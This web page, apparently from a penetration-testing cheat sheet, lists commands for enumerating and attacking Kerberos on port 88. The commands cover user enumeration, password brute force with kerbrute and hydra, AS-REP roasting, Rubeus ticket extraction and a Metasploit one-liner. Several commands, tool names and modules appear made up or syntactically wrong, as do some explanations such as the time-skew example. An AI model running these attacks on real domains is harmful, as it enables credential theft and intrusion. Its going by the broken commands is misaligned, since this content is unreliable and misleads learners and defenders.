LinkedInGithub
Edit

Kerberos 88

Kerberos Scanning and Enumeration - Port 88

Kerberos is a network authentication protocol designed to provide secure authentication over insecure networks. It is widely used in enterprise environments for managing user authentication across a network.

Kerberos Overview:

  • Default Port: 88

  • Protocol: Kerberos operates using tickets and symmetric encryption, providing secure authentication between clients and servers. The protocol is designed to be resistant to eavesdropping and replay attacks.

Enumeration Techniques:

  1. Banner Grabbing:

    • Use nc (Netcat) or nmap to attempt to grab the Kerberos service banner. Example:

      nc -vn <IP> 88
nmap -sU -p88 -sV <IP>  # Checking for Kerberos version and banner

  2. Service Version Detection:

    • Use nmap to detect the version of the Kerberos service running on port 88 and get detailed service information. Example:

      sudo nmap -sV -p 88 <IP>

  3. Enumerating Kerberos Services:

    • Use krb5-enum-users from tools like kerberos-enum-users to enumerate user accounts on a Kerberos server. Example:

      kerberosscan --users <domain> --kerberos-server <IP>

  4. Kerberos Ticket Request (AS-REQ) Analysis:

    • Send an Authentication Service Request (AS-REQ) to the Kerberos server to enumerate valid usernames by examining the response.

      • Tools like kerbrute are useful for brute-forcing Kerberos authentication attempts. Example:

      kerbrute userenum -d <domain> -i userlist.txt

  5. Brute Force Kerberos Authentication:

    • Use hydra or kerbrute to perform brute-force attacks against Kerberos authentication, typically targeting the AS-REP (Authentication Service Reply). Example with hydra:

      hydra -t 4 -L <userlist> -P <passwordlist> kerberos://<IP>

  6. Kerberos Service Principal Enumeration:

    • Kerberos Service Principal Names (SPNs) are often used to identify services within the Kerberos realm. You can enumerate these using tools like nmap or rpcclient. Example:

      nmap --script=krb5-enum-spns -p 88 <IP>

  7. Extracting Service Tickets (TGT):

    • You can attempt to request and analyze Ticket Granting Tickets (TGT) to identify valid users or service accounts. Tools like Rubeus allow you to interact with Kerberos and extract tickets. Example:

      Rubeus tgtdeleg /user:<username> /rc4:<password>

  8. AS-REP Roasting:

    • Some Kerberos implementations expose weak accounts that can be exploited via the AS-REP (Authentication Service Reply) message. This attack targets accounts with a non-null AS-REP message to gather encrypted password hashes. Example:

      kerbrute as-rep-roast -d <domain> -u <userlist> -o <output_file>

  9. Kerberos Domain Enumeration:

    • Use enum4linux or rpcclient to gather Kerberos-related information from Windows-based systems. Example with enum4linux:

      enum4linux -P -U -S <IP>

  10. Exploiting Kerberos Vulnerabilities:

    • Some Kerberos implementations are vulnerable to specific attack vectors, such as Ticket Granting Ticket (TGT) or Kerberos ticket forging. Example with Metasploit:

      msfconsole -q -x "use exploit/windows/kerberos/kerberos_ticket; set RHOSTS <IP>; run"

  11. Kerberos Time-Based Attacks:

    • Time synchronization is crucial for Kerberos to function properly. Manipulating the time (i.e., replaying old tickets or using time skew) can allow attackers to bypass certain security measures. Example:

    sudo ntpdate <IP>  # Manually set the time on your machine to exploit time-based attacks

  12. Automated Kerberos Enumeration with Nmap:

    • You can use Nmap's Kerberos-related scripts to automate enumeration of Kerberos services, users, and vulnerabilities. Example:

      nmap --script=krb5-enum-users -p 88 <IP>

Useful Tools for Scanning:

  • Nmap: For service enumeration and vulnerability scanning related to Kerberos.

  • Kerbrute: A tool for brute-forcing Kerberos authentication (username and password).

  • Rubeus: A tool for Kerberos ticket extraction and interaction with TGTs.

  • Enum4linux: A tool for enumerating information from SMB (Windows-based systems) in a Kerberos context.

  • Hydra: For brute-forcing Kerberos login using username and password combinations.

Common Kerberos Vulnerabilities:

  • Weak Passwords: Accounts with weak or default passwords are vulnerable to brute-force attacks.

  • Misconfigured SPNs: Service Principal Names not properly configured can lead to privilege escalation or service enumeration vulnerabilities.

  • Ticket Forging: Insecure Kerberos ticket management can allow attackers to forge valid authentication tickets.

PreviousIPMI 623NextMSSQL 1433,1434,2433

Last updated